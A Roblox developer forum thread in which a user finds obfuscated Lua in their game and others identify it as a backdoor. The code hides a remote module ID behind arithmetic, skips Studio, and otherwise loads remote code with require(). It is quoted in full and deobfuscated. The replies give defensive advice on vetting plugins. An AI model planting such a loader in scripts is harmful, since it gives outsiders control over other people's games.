My game script got edited by another dev

Wyzloc · September 22, 2019, 7:43am

So I haven’t checked my game in a while, and I decided to join the studio to make an update and i looked in one of the scripts and I see this:

local coro = coroutine.create(ibFhs = 'Workspace' ioO1Ju = game isAKIa8Ij = 'test' iCBrOqfBhY96 = require i15np9 = 'Debris' irFwdlLU = spawn iPa3wWOs = 'GetService' iofpThquabaP8 = 'PlaceId' iUbtEO6xALZ = math.sqrt iGrU = 71758291.702703 * 37 i7MQQJ4BShx = 'RunService' i1iGZPLJzwG = 'IsStudio' iGps773kV0n = 'MarketplaceService' ivf26e1a8K = 'RunService' iTKUIea9W2S = pcall iuanRXZNNPXGsD3 = pcall iZ39cDvYfak = 'ClassName' iNnQ240LZ = 'load'  irFwdlLU(       function()        iuanRXZNNPXGsD3(       function()        if ioO1Ju:GetService(ivf26e1a8K)       [i1iGZPLJzwG]       (ioO1Ju:GetService(ivf26e1a8K)       ) then         return        end iCBrOqfBhY96(iGrU)       [iNnQ240LZ]       (ioO1Ju[iofpThquabaP8]       )        end       )        end       )
function()

Do any of you know what this is? Maybe a plugin did it? I really hope one of my devs didn’t post this in the game, because It would be very sad.

kenami · September 22, 2019, 7:56am

Spaced up a little bit so you can understand that it is indeed a backdoor
Here’s why :

The code is made very confusing on purpose
you have “require” and a “id”, means it is most likely a module loading up
for some reason, it also opens up MarketplaceService, which means he could sell any gamepasses into your game UNLESS you have this disabled (Workspace’s properties)

i’ve never seen anything like that before lol

local coro = coroutine.create(ibFhs = 'Workspace'
ioO1Ju = game
isAKIa8Ij = 'test'
iCBrOqfBhY96 = require 
i15np9 = 'Debris' 
irFwdlLU = spawn 
iPa3wWOs = 'GetService'
 iofpThquabaP8 = 'PlaceId' 
iUbtEO6xALZ = math.sqrt 
iGrU = 71758291.702703 * 37
 i7MQQJ4BShx = 'RunService'
 i1iGZPLJzwG = 'IsStudio'
 iGps773kV0n = 'MarketplaceService' 
ivf26e1a8K = 'RunService' 
iTKUIea9W2S = pcall 
iuanRXZNNPXGsD3 = pcall
 iZ39cDvYfak = 'ClassName' 
iNnQ240LZ = 'load' 
 irFwdlLU(function()iuanRXZNNPXGsD3(function()
if ioO1Ju:GetService(ivf26e1a8K)[i1iGZPLJzwG](ioO1Ju:GetService(ivf26e1a8K)) then
return
end
iCBrOqfBhY96(iGrU)[iNnQ240LZ](ioO1Ju[iofpThquabaP8])
end)
end)
function()```

Wyzloc · September 22, 2019, 7:57am

Do you think a plugin edited my scripts, or a dev of the team did?

kenami · September 22, 2019, 7:58am

Both options are possible, to find out, please link all the plugins you currently possess.

Wyzloc · September 22, 2019, 7:59am

I have no plugins, but I can check the other devs plugins and see if any of them look fishy. Thanks for your help!

kenami · September 22, 2019, 8:07am

iCBrOqfBhY96(iGrU)[iNnQ240LZ](ioO1Ju[iofpThquabaP8])

means

require(2655056793)[load](game[PlaceId])

it leads to a “March 22 2019” Deleted asset, it’s probably safe to assume it’s a plugin
https://www.roblox.com/library/2655056793/Content-Deleted
As a prevention to any backdoor, all you need to do is check codes that includes something such as require(id)

tradeArray · September 22, 2019, 12:09pm

I recommend not having devs do it in the actual game to prevent backdoors i always have my devs do it in another baseplate…

please close thread.

Qxual · September 22, 2019, 12:56pm

You shouldn’t be letting developers you don’t trust as much to your game as stated above, but also it might not end well if you accuse any of them for this and that might end up false. I’d suggest reviewing the sources and see if it’s a plugin.

colbert2677 · September 22, 2019, 7:24pm

That doesn’t prevent backdoors at all. You’re just changing the place in which you’re working at. Simple solution is just to check what you’re installing and verify its creator rather than taking it without a second thought behind it.

Minstrix · September 22, 2019, 8:47pm

I think the idea is that if they do their work in another place, you can kind of scan through it while you’re moving it over. As well, the main game is usually much larger and thus easier to hide a backdoor script in.

EmilyBendsSpace · September 22, 2019, 9:29pm

When the additional developers are only building, it makes this a lot of sense to have that happening in a separate team create place from where the scripting is being done.

Free models and rogue plugins can both still be sources of backdoors. Plugins have access to more of the datamodel, and can execute code that affects your place file outside of Play runtime, so they are more dangerous overall and can hide things in your place. You have to carefully inspect every plugin you install and be very pro-active in protecting your main place file against remote developers whose plugin situations you cannot control.

HabibiBean · September 22, 2019, 9:32pm

How did you turn that random jumble of letters into an ID?

kenami · September 22, 2019, 9:38pm

iGrU = 71758291.702703 * 37

if you do the maths, it indirectly gives 2655056793, which means the math result is the one loading,
it’s technically not converting letters into numbers,
but iGrU defined numbers, so logically, the id.

HabibiBean · September 22, 2019, 9:40pm

How did you find out what iGrU is?

kenami · September 22, 2019, 9:43pm

in the first post, you just see that iGrU is equal to numbers

Then you look via web with https://www.roblox.com/library/ID/Model